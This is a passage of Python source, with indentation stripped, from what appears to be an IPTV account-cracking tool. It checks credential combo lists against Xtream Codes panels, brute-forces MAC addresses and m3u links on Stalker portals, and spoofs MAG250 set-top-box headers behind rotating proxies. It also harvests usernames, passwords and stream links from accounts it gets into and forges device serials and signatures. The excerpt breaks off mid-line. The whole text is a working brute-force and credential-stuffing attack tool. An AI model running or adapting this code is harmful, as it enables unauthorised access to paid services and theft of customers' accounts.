while True:
allInfo = dict()
if Glb.useProxy == 'yes':
myProxy = Proxies().get_proxy(Glb.proxy_type)
session.proxies.update(myProxy[1])
allInfo.update({'ProxyUsed': myProxy[0]})
try:
content = {'referrer': '', 'username': f'{User}', 'password': f'{Pass}'}
header = self.myHeaders
header.update({'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36"})
session.headers.update(header)
redirect = session.get(server)
header.update({'Referer': f"{redirect.url}"})
reqPanel_post = session.post(redirect.url, data=content, allow_redirects=True)
if 'Logged In' or 'Logout' in reqPanel_post.text:
url_p = reqPanel_post.url
parsed_url = urlparse(url_p)
url_panel = '{uri.scheme}://{uri.netloc}'.format(uri=parsed_url)
_data = {'credits': '0', 'active_accounts': '0'}
req_dasboard = session.get(url_panel + self.panelDash)
try:
_data = req_dasboard.json()['user_info']
except:
_data = req_dasboard.json()
fileName = server.split('://')[1].split(':')[0].split('/')[0]
my_date = datetime.now().strftime('%b %d, %Y %I:%M %p')
allInfo.update({'\xf0\x9f\x8c\x8e Server': server, '\xf0\x9f\x91\xa4 User': User, '\xf0\x9f\x94\x91 Pass': Pass, '\xf0\x9f\x92\xb0 Credits': _data['credits'], '\xf0\x9f\x91\xa5 Active_acc': _data['active_accounts']})
allInfo.update({'\xf0\x9f\x93\x86 Scan_date': my_date, '\xe2\x9a\x99\xef\xb8\x8fModule': "Xtream Code Panel System", 'FileName': fileName})
result = ('Good', allInfo)
break
else:
allInfo.update({'Server': server, 'User': User, 'Pass': Pass})
result = ('Bad', allInfo)
break
except Exception as e:
allInfo.update({'Server': server, 'User': User, 'Pass': Pass, 'Error': str(e)})
result = ('Error', allInfo)
del e
finally:
if Glb.result_logger is None:
Glb.results.put(result)
else:
Glb.result_logger(result)
session.close()
return
def auto_method(self, data):
for serv in Glb.serverList:
if 'stalker_portal' in serv:
self.stlk_mac(data, serv)
else:
self.xc_mac(data, serv)
def xc_mac(self, data, server):
"""This is the method or script is for Xtream Code servers """
result = tuple()
mac = data['_data']
session = self.requests.session()
while True:
allInfo = dict()
if Glb.useProxy == 'yes':
myProxy = Proxies().get_proxy(Glb.proxy_type)
session.proxies.update(myProxy[1])
allInfo.update({'ProxyUsed': myProxy[0]})
try:
header = self.myHeaders
header.update({'Referer': server + '/c/', 'User-Agent': "Mozilla/5.0 (QtEmbedded; U; Linux; C) AppleWebKit/533.3 (KHTML, like Gecko) MAG200 stbapp ver: 2 rev: 250 Safari/533.3", 'X-User-Agent': "Model: MAG250; Link: WiFi"})
udid = secrets.token_hex(16)
cookies = {'mac': mac, 'stb_lang': "en", 'timezone': "America%2FNew_York", 'adid': udid}
url = f'{server}/portal.php?type={self.hand_shake}'
GetHand = session.get(url, headers=header, cookies=cookies, timeout=Glb.waitTime, allow_redirects=True)
url_server = GetHand.url
parsed_url = urlparse(url_server)
real_server = '{uri.scheme}://{uri.netloc}'.format(uri=parsed_url)
header.update({'Referer': real_server + '/c/'})
allInfo.update({'\xf0\x9f\x8c\x8e Server': real_server, '\xf0\x9f\x93\xbd Mac': mac})
if GetHand.status_code == 200:
token = Parse().parse_btw_str(GetHand.text, 'token":"', '"')
header.update({'Authorization': 'Bearer ' + token})
GetCheck = session.get(real_server + self.xc_prof, headers=header, cookies=cookies)
check = GetCheck.text
if '\"status\":0' in check: # Good Account
proxiesNone = {"http": '', "https": ''}
session.proxies.update(proxiesNone)
GetData = session.get(real_server + self.xc_cmd, headers=header, cookies=cookies)
getCmd = GetData.json()['js']['cmd']
info = getCmd.split('/')
user = info[3]
pwd = info[4]
List_m3u = self.urlM3u.replace('my_server', real_server).replace('my_user', user).replace('my_pwd', pwd)
myApi = self.urlApi.replace('my_server', real_server).replace('my_user', user).replace('my_pwd', pwd)
allInfo.update({'\xf0\x9f\x91\xa5 User': user, '\xf0\x9f\x94\x91 Pass': pwd})
try:
GetDate = session.get(myApi, headers=self.myHeaders) # , proxies=proxies)
GetData = GetDate.json()['user_info']
status = GetData['status']
exp_parse = Parse().parse_btw_str(GetDate.text, 'exp_date":"', '"')
if re.search('([0-9]{10,15})', exp_parse):
exp_date = str(datetime.fromtimestamp(int(exp_parse)).strftime('%b %d, %Y '))
else:
exp_date = str(exp_parse)
max_conx = GetData['max_connections']
connected = GetData['active_cons']
if max_conx is None:
max_conx = 'Unknow/Unlimited \xf0\x9f\x98\xb2'
allInfo.update({'\xf0\x9f\x9a\xa6 Status': status, '\xe2\x8f\xb1 Exp_date': exp_date, '\xf0\x9f\x94\x8c Connected': connected, '\xf0\x9f\x9a\x8c Max_conn': max_conx})
except Exception as e_api:
try:
url_info = f'{real_server}/portal.php?type={self.info}'
Getinfo = session.get(url_info, headers=header, cookies=cookies)
getDate = Getinfo.json()['js']['phone']
if getDate is None:
exp_date = '💫UNLIMITED💫'
elif re.search('([0-9]{10,15})', getDate):
exp_date = str(datetime.fromtimestamp(int(getDate)).strftime('%b %d, %Y %X %p'))
else:
exp_date = str(getDate)
allInfo.update({'\xe2\x8f\xb1 Exp_date': exp_date})
except Exception as e_api:
del e_api
my_date = datetime.now().strftime('%b %d, %Y %I:%M %p')
fileName = server.split('://')[1].split(':')[0].split('/')[0]
allInfo.update({'\xf0\x9f\x93\x86 Scan_date': my_date, '\xf0\x9f\x8e\xac\xf0\x9f\x94\x97 List m3u': List_m3u, 'FileName': fileName})
allInfo.update({'\xe2\x9a\x99\xef\xb8\x8fModule': "Xtream Code Hits System"})
try:
url_gen = f'{real_server}/portal.php?type={self.geners}'
categories = session.get(url_gen, headers=header, cookies=cookies)
categories_json = categories.json()
categories_list = Parse().parse_json_rec(categories_json, 'title')
allInfo.update({'\xf0\x9f\x93\x81 Categories': categories_list})
except Exception as e_cat:
del e_cat
result = ('Good', allInfo)
break
elif '\"status\":1' in check:
result = ('Bad', allInfo)
break
else: # Error
result = ('Error', allInfo)
else: # Some Status_Code Errors
code = GetHand.status_code # code (403) proxy not allow in the server, (502) proxy banned
allInfo.update({'Code': str(code)})
result = ('StatusCode', allInfo)
except Exception as e: # most like server blocked, (Caused by NewConnectionError, Caused by ConnectTimeoutError)
try:
error = Parse().parse_btw_str(str(e), '>:', '))')
allInfo.update({'Error': error})
result = ('Error', allInfo)
except Exception as e:
del e
finally:
if Glb.result_logger is None:
Glb.results.put(result)
else:
Glb.result_logger(result)
session.close()
return
def stlk_mac(self, data, server):
"""This is the method or script is for Stalkers servers """
result = tuple()
mac = data['_data']
session = self.requests.session()
while True:
allInfo = dict()
if Glb.useProxy == 'yes':
myProxy = Proxies().get_proxy(Glb.proxy_type)
session.proxies.update(myProxy[1])
allInfo.update({'ProxyUsed': myProxy[0]})
try:
header = self.myHeaders
header.update({'Referer': server + '/c/', 'User-Agent': "Mozilla/5.0 (QtEmbedded; U; Linux; C) AppleWebKit/533.3 (KHTML, like Gecko) MAG200 stbapp ver: 2 rev: 250 Safari/533.3", 'X-User-Agent': "Model: MAG250; Link: WiFi"})
udid = secrets.token_hex(16)
cookies = {'mac': mac, 'stb_lang': "en", 'timezone': "America%2FNew_York", 'adid': udid}
url = f'{server}/server/load.php?type={self.hand_shake}'
GetHand = session.get(url, headers=header, cookies=cookies, timeout=Glb.waitTime, allow_redirects=True)
url_server = GetHand.url
parsed_url = urlparse(url_server)
real_server = '{uri.scheme}://{uri.netloc}'.format(uri=parsed_url)
header.update({'Referer': real_server + '/c/'})
allInfo.update({'\xf0\x9f\x8c\x8e Server': real_server, '\xf0\x9f\x93\xbd Mac': mac})
if GetHand.status_code == 200:
token = Parse().parse_btw_str(GetHand.text, 'token":"', '"')
random = Parse().parse_btw_str(GetHand.text, 'random":"', '"')
header.update({'Authorization': 'Bearer ' + token})
getstkl_prof = self.stkl_prof
metrics = '{"mac":"my_mac","model":"","type":"STB","uid":"","random":"my_rnd"}'.replace('my_mac', mac).replace('my_rnd', random)
my_metrics = urllib.parse.quote_plus(metrics, safe='', encoding=None, errors=None)
for r in ("my_time", str(int(time.time()))), ("my_metrics", metrics): # ("my_metrics", my_metrics):
getstkl_prof = getstkl_prof.replace(*r)
GetCheck = session.get(server + getstkl_prof, headers=header, cookies=cookies)
if '\"last_watchdog\":\"' in GetCheck.text: # Good Account
GetCheckData = GetCheck.json()
last = GetCheckData['last_watchdog']
if last != '0000-00-00 00:00:00':
user = GetCheckData['login']
pwd = GetCheckData['password']
allInfo.update({'\xf0\x9f\x91\xa5 User': user, '\xf0\x9f\x94\x91 Pass': pwd})
try:
getDate = GetCheckData['expire_billing_date']
if getDate is None:
exp_date = '💫UNLIMITED💫'
elif re.search('([0-9]{10,15})', getDate):
exp_date = str(datetime.fromtimestamp(int(getDate)).strftime('%b %d, %Y '))
else:
exp_date = str(getDate)
allInfo.update({'\xe2\x8f\xb1 Exp_date': exp_date})
except Exception as e:
del e
serial = hashlib.md5(mac.encode('utf-8')).hexdigest().upper()
device_ID = hashlib.sha256(mac.encode('utf-8')).hexdigest().upper()
serial_cut = serial[:13]
sig_code = serial_cut + '+' + mac
sig = hashlib.sha256(sig_code.encode('utf-8')).hexdigest().upper()
my_date = datetime.now().strftime('%b %d, %Y %I:%M %p')
allInfo.update({'Serial': serial, 'SerialCut': serial_cut, 'DeviceID': device_ID, 'Signature': sig, 'Scan_date': my_date, '\xe2\x9a\x99\xef\xb8\x8fModule': "Stalker Hits System"})
result = ('Good', allInfo)
break
else:
result = ('Bad', allInfo)
break
else: # Bad Account
result = ('Bad', allInfo)
break
else: # Some Status_Code Errors
code = GetHand.status_code # code (403) proxy not allow in the server, (502) proxy banned
allInfo.update({'Code': str(code)})
result = ('StatusCode', allInfo)
except Exception as e: # most like server blocked, (Caused by NewConnectionError, Caused by ConnectTimeoutError)
try:
error = Parse().parse_btw_str(str(e), '>:', '))')
allInfo.update({'Error': error})
result = ('Error', allInfo)
except Exception as e:
del e
finally:
if Glb.result_logger is None:
Glb.results.put(result)
else:
Glb.result_logger(result)
session.close()
return
def channel_bf(self, data):
"""This is the method or script is for Brute Force m3u channel link"""
result = tuple()
combo = list(data.values())
varCombo = list(filter(None, str(combo[0]).split(':')))
for link in Glb.serverList:
varsToreplace = Parse().parse_btw_rec(link, '<', '>')
data_var = cycle(varCombo)
server = link
for var in varsToreplace:
my_var = str()
try:
my_var = next(data_var)
except StopIteration as e:
pass
server = server.replace(f'<{var}>', my_var)
session = self.requests.session()
while True:
allInfo = dict()
if Glb.useProxy == 'yes':
myProxy = Proxies().get_proxy(Glb.proxy_type)
session.proxies.update(myProxy[1])
allInfo.update({'ProxyUsed': myProxy[0]})
try:
allInfo.update({'\xf0\x9f\x8c\x8e Server': server})
header = self.myHeaders
header.update({ 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"})
http_req = session.get(server, headers=header, allow_redirects=True)
reqGet = http_req.text
url_server = http_req.url
if http_req.status_code == 200 and '#EXTM3U' in reqGet: # <===== Good Account (#EXTM3U, #EXTINF)
my_date = datetime.now().strftime('%b %d, %Y %I:%M %p')
fileName = server.split('://')[1].split(':')[0].split('/')[0]
allInfo.update({'FileName': fileName, '\xf0\x9f\x94\x97 m3u_Link': url_server, '\xf0\x9f\x93\x86 Scan_date': my_date, '\xe2\x9a\x99\xef\xb8\x8fModule': "Channel Brute Force"})
result = ('Good', allInfo)
break
elif http_req.status_code == 200 and reqGet != '#EXTM3U': # <===== Bad Account
allInfo.update({'Server': server})
result = ('Bad', allInfo)
break
else:
allInfo.update({'Code': str(http_req.status_code)})
result = ('StatusCode', allInfo)
except Exception as e:
try:
error = e.args[0]
allInfo.update({'Server': server, 'Error': error})
result = ('Error', allInfo)
if 'Exceeded 30 redirects.' in error: # TooManyRedirects
result = ('Bad', allInfo)
break
except Exception as e:
del e
finally:
if Glb.result_logger is None:
Glb.results.put(result)
else:
Glb.result_logger(result)
session.close()
return
class Thread:
"""This Class contain all initial methods on preparation for the parallel system"""
def __init__(self, **kwarg):
self.threads = Glb.threadMain
self.credentials = kwarg['wrl']
self.servers = kwarg['servlist']
self.my_iter = None
self.load_combo()
self.load_servers()
self.load_proxies()
Requirements().selfcheck()
if Glb.servers_length > 0:
Glb.totalToCheck = Glb.servers_length * Glb.combo_length
else:
Glb.totalToCheck = Glb.combo_length
def load_combo(self):
try:
with open(Glb.combo_path, 'r', errors='ignore') as file:
for i in range(Glb.start_combo):
_ = next(file, 1)
for i in range(10000):
line = next(file).replace('\n', '')
if (Glb.scan_mode == '2' or Glb.scan_mode == 'panel') and line.count(':') == 1:
self.credentials.append({'_data': line})
self.my_iter = self.credentials
elif Glb.scan_mode == '3' and line.count(':') == 5:
self.credentials.append({'_data': line})
self.my_iter = self.credentials
elif Glb.scan_mode == '5':
self.credentials.append({'_data': line})
self.my_iter = self.credentials
elif Glb.scan_mode == '6' and line.count(':') == 1:
self.credentials.append({'_data': line})
self.my_iter = self.credentials
except StopIteration as stop_e:
Glb.combo_length = Glb.start_combo + len(self.credentials) # for reload 10000 credentials
del stop_e
except OSError as e:
del e
flag = len(Glb.comboList)
if flag > 0:
self.credentials = Glb.comboList
Glb.combo_length = flag
self.my_iter = self.credentials
elif Glb.mac_auth is True:
Glb.combo_length = 16 ** Glb.mac_fill
end_range = Glb.start_combo + min(10000, ((16 ** Glb.mac_fill) - Glb.start_combo))
if Glb.mac_rnd:
if Glb.combo_length > 1048576: # 16**5
my_iter = [random.randrange(0, Glb.combo_length) for i in range(Glb.start_combo, end_range)]
else:
if Glb.start_combo == 0:
Glb.list_rnd_mac = list(range(Glb.combo_length))
random.shuffle(Glb.list_rnd_mac)
my_iter = islice(Glb.list_rnd_mac, Glb.start_combo, end_range)
else:
my_iter = range(Glb.start_combo, end_range) # <-- final range for interator
self.my_iter = [self.mac_generator(item) for item in my_iter]
elif Glb.scan_mode == '5':
end_range = Glb.start_combo + min(10000, (max(Glb.channel_inter) + 1 - Glb.start_combo))
start_range = Glb.start_combo + min(Glb.channel_inter)
my_iter = range(start_range, end_range)
[self.credentials.append({'_data': item}) for item in my_iter]
self.my_iter = self.credentials
else:
Glb.running = False
Display().error_msg(f'{Glb.A}Please make sure your combo file exist {Glb.RST} and start again')
input('Please press ENTER to continue')
return StartApp().re_startApp()
def load_servers(self):
if Glb.scan_mode != '6':
try:
with open(Glb.servers_path, errors='ignore') as (f):
linesS = f.read().split('\n')
for server in linesS:
if server.count('://') == 1:
Glb.serverList.append(server)
Glb.serverList = list(set(Glb.serverList))
Glb.servers_length = len(Glb.serverList)
except OSError as e:
del e
finally:
if len(Glb.serverList) == 0:
Display().error_msg('Something happened with your server file, Please start again')
input('Please press ENTER to continue')
return StartApp().re_startApp()
def load_proxies(self):
try:
if Glb.useProxy == 'yes':
if Glb.useFreeProxies == 'yes':
import requests
proxyType = Glb.proxy_type
urlapi = f'https://a...content-available-to-author-only...e.com/?request=getproxies&proxytype={proxyType}&timeout=10000&country=all&ssl=all&anonymity=all'
myHeaders = {'Connection': "keep-alive", 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36', 'Accept': "*/*"}
try:
response = requests.get(urlapi, headers=myHeaders, timeout=Glb.waitTime, allow_redirects=True)
data = response.text
proxies = data.split('\r\n')
for proxy in proxies:
if re.search(r"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+)", proxy):
Glb.proxyList.append(proxy)
Glb.proxy_length = len(Glb.proxyList)
Glb.proxy_pool = cycle(Glb.proxyList)
except Exception as pe:
Display().error_msg('Something happened, no free proxies available\nPlease start again and use your own proxy file')
print(pe)
input('Please press ENTER to continue')
return StartApp().re_startApp()
else:
with open(Glb.proxy_path, 'r', errors='ignore') as (f):
linesP = f.read().split('\n')
for proxy in linesP:
if proxy.count('.') == 3:
Glb.proxyList.append(proxy)
elif proxy.count(':') == 3:
Glb.proxyList.append(proxy)
Glb.proxy_length = len(Glb.proxyList)
Glb.proxy_pool = cycle(Glb.proxyList)
except OSError as e:
Display().error_msg(str(e) + '\nSomething happened with your proxy file, Please start again')
del e
input('Please press ENTER to continue')
return StartApp().re_startApp()
def mac_generator(self, enumerator):
hex_num = hex(enumerator)[2:].zfill(Glb.mac_fill)
fmac = (Glb.mac_pattern + hex_num).upper()
macCombo = "{}{}:{}{}:{}{}:{}{}:{}{}:{}{}".format(*fmac)
return {'_data': macCombo}
def display(self, loggerfunc):
if len(Glb.dsp_update_thd) < 1:
Display().start_time()
dsp_update = threading.Thread(target=loggerfunc, daemon=True)
dsp_update.start()
Glb.dsp_update_thd.append(dsp_update)
def threads_poll(self, my_func):
if Glb.host == 'TERMUX':
live_threads = []
def thread_creator():
threads = [threading.Thread(target=my_func, kwargs={'data': _}, daemon=True) for _ in self.my_iter]
thread_index = 0
while len(threads) - 1 >= thread_index:
death_thread = []
if len(live_threads) < self.threads:
for x in range(min(self.threads - len(live_threads), len(threads))):
threads[thread_index].start()
live_threads.append(threads[thread_index])
Glb.start_combo += 1
thread_index += 1
for thread_death in live_threads:
if thread_death.is_alive():
pass
else:
death_thread.append(thread_death)
for _ in death_thread:
live_threads.remove(_)
time.sleep(.1)
if Glb.start_combo < Glb.combo_length:
thread_creator()
else:
for thrd in live_threads:
thrd.join()
if Glb.start_combo < Glb.combo_length and Glb.running is True:
thread_creator()
else:
pool = Pool(self.threads)
for bot in pool.imap_unordered(func=my_func, iterable=self.my_iter):
Glb.start_combo += 1
if Glb.running is False:
break
if Glb.start_combo < Glb.combo_length and Glb.running is True:
self.credentia